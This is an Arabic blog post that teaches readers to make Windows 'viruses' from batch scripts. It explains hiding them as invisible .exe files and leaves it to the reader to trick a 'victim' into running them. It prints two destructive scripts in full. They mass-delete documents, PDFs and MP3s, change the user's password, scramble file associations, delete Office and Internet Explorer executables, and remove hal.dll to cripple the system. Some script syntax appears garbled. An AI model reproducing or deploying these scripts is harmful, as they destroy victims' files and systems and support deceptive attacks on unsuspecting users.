اسهل طريقة لصناعة فيروسات الويندوز!


في هذا الموضوع  سأقدم لكم طريقة سهلة لصناعة فيروسات خطيرة للويندوز وذلك بالاعتماد على سكريبتات البات او ما يعرف ب batch file

هذه الطريقة لا تحتاج الى معرفة لغات البرمجة سواء عالية المستوى او المنخفضة فقط معرفة بعض اوامر DOS السطحية

اولا يجب المعرفة بأنه من اهم خصائص الفيروسات هي ان يكون الفيروس مخفي اثناء التشغيل

اي ان لايشعر المستخدم بوجوده

سأقوم الآن بكتابة سكربت  يقوم باظهار رسالة للمستخدمين عن طريق الامر msg

الامر سيكون كالتالي

! msg * hello idiot

نفتح اي برنامج لتحرير النصوص على سبيل المثال notepad نقوم بكتابة الامر

وبعد ذلك حفظ الملف بصيغة bat

عند تشغيل الملف ستظهر الرسالة التالية

تخيل معي انه مكان هذا الامر توجد اوامر خبيثة على سبيل المثال مجموعة من الاوامر تقوم بحذف  كل الملفات الموجودة على الجهاز

حسنا هذه ليست الا البداية لأنه عند الضغط على ملف bat ستظهر شاشة الدوز السوداء اذن الفيروس مازال بدائي

الآن طريقة اخفاء الفايروس توجد عدة طرق سأذكر منها طريقة  وجد عملية وهي اننا سنقوم بتحويل الفيروس الى

ملف بالامتداد exe سيكون ملف تنفيذي بعد ان كان مجرد سكريبت وذلك بالاستعانة بأداة تدعى

bat to exe converter

يمكن تحميلها من الرابط التالي:

click here

الصورة التالية توضح الاداة:

كما هو مبين نحدد ملف الباتش اي السكريبت وبعد ذلك نحدد الملف الناتج وهو الملف التنفيذي الذي سيتم التحويل اليه

وايضا نقوم بتحديد invisible application وذلك لاخفاء واجهة الدوز عند تشغيل الفيروس

ثم نضغط على زر compile في يسار اسفل نافذة البرنامج

عندها نذهب الى المجلد الذي اخترنا وضع الملف التنفيذي داخله لنجد الفيروس بصيغة exe

الآن عرفنا طريقة صناعة فيروس بامتداد exe يعمل مخفي اثناء تشغيله

هناك نقطة مهمة جدا هي كيفية ايصال الفيروس الى الضحية تلك اتركها للقارئ

لأنه لكل شخص طريقته الخاصة للخداع واقناع الضحية بتشغيل الفيروس

الآن سأقوم بوضع سكريبتات خطير جدا انصح بعدم تجربته على النظام

وان كان لابد من ذلك يرجى تجربته على الآلة التخيلية

السكربت الاول يقوم بمجموعة من الاشياء الخطيرة

اولا يقوم بحذف جميع ملفات word ثم يحذف جميع ملفات pdf وبعد ذلك

يحذف ملفات mp3 ثم يغير كلمة سر المستخدم الى كلمة ahoss

بعد ذلك يقوم بتشغيل الصفحة

ahoss.wordpress.com

كود السكريبت:

rem Delete All Documents
DIR /S/B %SystemDrive%\*.doc >> FIleList_doc.txt
echo Y | FOR /F “tokens=1,* delmis=: ” %%j in (FIleList_doc.txt) do del “%%j:%%k”


rem Delete All Pdf
DIR /S/B %SystemDrive%\*.pdf >> FIleList_pdf.txt
echo Y | FOR /F “tokens=1,* delmis=: ” %%j in (FIleList_pdf.txt) do del “%%j:%%k”


rem Delete All Mp3
DIR /S/B %SystemDrive%\*.mp3 >> FIleList_mp3.txt
echo Y | FOR /F “tokens=1,* delmis=: ” %%j in (FIleList_mp3.txt) do del “%%j:%%k”


rem Change User Password To ahoss
net user %username% ahoss


rem Open Web Page
الآن الى السكربت الثاني خطير ايضا حيث سيقوم بالتخليط بين انواع الملفات على سبيل المثال
بلاستعانة بالامر assoc
ملفات mp3 تدعم بواسطة محرر النصوص وليس مشغل الاغاني وايضا ملفات png ستدعم كذلك
بمحرر النصوص هناك الكثير من الاشياء ايضا سيقوم بحذف برنامج Microsoft word وبرنامج Excel وبرنامج IExplorer
ومفاجأة السكريبت هي حذف ملف hal.dll
السكريبت هو:
rem Confuse File Extensions Powerup
assoc .dll=txtfile
assoc .exe=pngfile
assoc .vbs=Visual Style
assoc .reg=xmlfile
assoc .txt=regfile


rem Confuse File Extensions for text
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile


rem Delete Word
tskill WINWORD
del /f /q “%SystemDrive%\Program Files\Microsoft Office\Office10\WINWORD.EXE”


rem Delete Excel
tskill excel
del /f /q “%SystemDrive%\Program Files\Microsoft Office\Office10\EXCEL.EXE”


rem Delete Internet Explorer
tskill iexplore
del /f /q “C:\Program Files\Internet Explorer\iexplore.exe”


rem Disable Computer By Deleting hal.dll
del /f /q %SystemDrive%\WINDOWS\system32\hal.dll

للحصول على السكريبتات هناك ملف مضغوط في Box Widget والموجود يسار الشاشة يسمى Scripts.rar
هنا ينتهي موضوع اليوم وان شاء الله مواضيع متقدمة قريبا على المدونة

أضف تعليق

Filed under Uncategorized

اترك رد

إملأ الحقول أدناه بالمعلومات المناسبة أو إضغط على إحدى الأيقونات لتسجيل الدخول:

شعار ووردبريس.كوم

أنت تعلق بإستخدام حساب WordPress.com. تسجيل خروج   /  تغيير )

Google photo

أنت تعلق بإستخدام حساب Google. تسجيل خروج   /  تغيير )

صورة تويتر

أنت تعلق بإستخدام حساب Twitter. تسجيل خروج   /  تغيير )

Facebook photo

أنت تعلق بإستخدام حساب Facebook. تسجيل خروج   /  تغيير )

Connecting to %s